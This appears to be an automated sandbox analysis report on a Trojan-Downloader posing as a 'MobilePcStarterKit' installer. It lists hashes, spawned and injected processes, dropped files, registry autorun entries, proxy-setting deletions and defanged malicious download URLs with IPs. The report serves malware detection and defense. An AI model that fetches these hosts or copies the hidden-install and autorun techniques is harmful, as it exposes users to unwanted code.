MD5: 0861e59c41bb5f407dacedf51edab54f
SHA1: 947872652cd00324bbc9823a80d1571ecf7ea9bf
SHA256: e611bc723a644a830e294e30f20846eb06301beb82c585e1a2eeee41b72b18cb
SSDeep: 6144:x/QiQPX/SJZVpdtyhvOr7dJ p5QRYelwdOgNsoIVYIHq xKH9xErOdGw6h:pQiGPYZVpXyVOvdJ p5QRYOwhNvISIH9
Size: 385595 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: Lefif
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

cas.exe:3804
W15R20Q1Q1.exe:1980
%original file name%.exe:4008
wincom_FYV.exe:192
W15R20Q1Q1.tmp:2228
8G0VBB.exe:2788
R3VW2WN639.exe:2760

The Trojan injects its code into the following process(es):

9VW7H7KFES.exe:544
caster.exe:3788
8G0VBB.exe:2704
setup.exe:2104
advise.exe:3996
0861e59c41bb5f407dacedf51edab54f.tmp:2084
R3VW2WN639.exe:1668
50U0P6CTE.exe:2996

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process cas.exe:3804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe.config (1 bytes)
%Program Files%\YW6DQ3G9K4\uninstaller.exe.config (1 bytes)
%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe (20404 bytes)
%Program Files%\YW6DQ3G9K4\uninstaller.exe (196 bytes)

The process 9VW7H7KFES.exe:544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)

The process caster.exe:3788 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\cast.config (37 bytes)

The process W15R20Q1Q1.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp\W15R20Q1Q1.tmp (1415 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp\W15R20Q1Q1.tmp (0 bytes)

The process %original file name%.exe:4008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-SGBAU.tmp\0861e59c41bb5f407dacedf51edab54f.tmp (1414 bytes)

The process wincom_FYV.exe:192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp (78068 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\gch8FD3.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tuto_monetize_120161205\tuto_monetize_120161205\2.00\cnf.cyl (144 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp-shm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp-wal (0 bytes)

The process W15R20Q1Q1.tmp:2228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\mpck\unins000.dat (1374 bytes)
%Program Files%\mpck\is-9N7HB.tmp (23473 bytes)
%Program Files%\mpck\is-FHO2R.tmp (23062 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup\_shfoldr.dll (47 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup\_shfoldr.dll (0 bytes)

The process 8G0VBB.exe:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\asasa.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe (19468 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\advise.exe (145773 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\asasa.exe (208 bytes)
%Program Files%\mpck\config.conf (35 bytes)

The process setup.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\mpck\wincom_FYV.exe (335632 bytes)
%Program Files%\mpck\uninstaller.exe (66563 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\W15R20Q1Q1.exe (81615 bytes)
%Program Files%\mpck\8G0VBB.exe (49754 bytes)

The process advise.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe (7853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe (26266 bytes)

The process 0861e59c41bb5f407dacedf51edab54f.tmp:2084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\idp.dll (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\setup.exe (130856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\_isetup\_shfoldr.dll (47 bytes)

The process R3VW2WN639.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\appsoft.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\appsoft.exe (218209 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe (744 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe.config.config (1 bytes)

The process 50U0P6CTE.exe:2996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YW6DQ3G9K4\cast.config (37 bytes)

Registry activity

The process cas.exe:3804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 9VW7H7KFES.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASMANCS]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"N5WHVTE233" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe"

The process caster.exe:3788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASAPI32]
"FileDirectory" = "%windir%\tracing"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VA5YBTJ0T5" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe"

The process wincom_FYV.exe:192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

The process W15R20Q1Q1.tmp:2228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"MajorVersion" = "1"

[HKCU\Software\Microsoft\RestartManager\Session0001]
"SessionHash" = "2C EE CA 40 BF 08 19 2A 96 40 4F 52 10 63 E5 31"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"Inno Setup: User" = "%CurrentUserName%"
"Inno Setup: Language" = "english"
"InstallLocation" = "%Program Files%\mpck\"
"DisplayVersion" = "1.1"
"Inno Setup: App Path" = "%Program Files%\mpck"
"QuietUninstallString" = "%Program Files%\mpck\unins000.exe /SILENT"

[HKCU\Software\Microsoft\RestartManager\Session0001]
"RegFilesHash" = "DD E4 9A 3E A8 25 1B D7 0D 6C 4E D0 F3 49 A4 64"
"RegFiles0000" = "%Program Files%\mpck\mobilepcstarterkit_widget.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"MinorVersion" = "1"
"EstimatedSize" = "3922"
"DisplayName" = "mpck version 1.1"
"Inno Setup: Icon Group" = "mpck"
"Publisher" = "mobilepcstarterkit"

[HKCU\Software\Microsoft\RestartManager\Session0001]
"Owner" = "B4 08 00 00 21 76 2F F7 20 4F D2 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"Inno Setup: Setup Version" = "5.5.4 (a)"
"NoRepair" = "1"

[HKCU\Software\Microsoft\RestartManager\Session0001]
"Sequence" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"InstallDate" = "20161205"
"NoModify" = "1"
"UninstallString" = "%Program Files%\mpck\unins000.exe"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0001]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0001]
"SessionHash"
"Owner"
"RegFiles0000"
"Sequence"
"RegFilesHash"

The process 8G0VBB.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OTUTPRODUCT_6NAS9" = "%Program Files%\mpck\8G0VBB.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 8G0VBB.exe:2788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process setup.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\otut]
"partner" = "ref015"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\otut]
"Product" = "mpck"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\otut]
"channel" = "2"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DMunversion]
"Version" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"UninstallString" = "%Program Files%\mpck\uninstaller.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINCOMFYV" = "%Program Files%\mpck\wincom_FYV.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process advise.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\wewewe]
"Product" = "diskpower"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\wewewe]
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 0861e59c41bb5f407dacedf51edab54f.tmp:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"SessionHash" = "EF 6A 23 D9 4F EE F1 22 55 82 3C F3 E2 22 B9 E0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "60 2C 1D EF 20 4F D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Owner" = "24 08 00 00 2F A6 77 F8 20 4F D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionTime" = "60 2C 1D EF 20 4F D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process R3VW2WN639.exe:2760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process R3VW2WN639.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_COMG6" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 50U0P6CTE.exe:2996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"JQRO84EYHS" = "%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: MobilePcStarterKit
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: MobilePcStarterKit Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://download.cleanshot.host/download/2/mobilepcstarterkit-installer.exe	94.23.252.37
hxxp://download.cleanshot.host/download/2/wizzproduct.exe	94.23.252.37
hxxp://download.cleanshot.host/download/2/mobilepcstarterkit_widget.exe	94.23.252.37
hxxp://agent.wizztrakys.com/remotes_xml_sections.php	94.23.44.92
hxxp://download.cleanshot.host/download/4/replaceUninstaller.exe	94.23.252.37
hxxp://download.cleanshot.host/get/3/wizzcaster_v2.exe	94.23.252.37
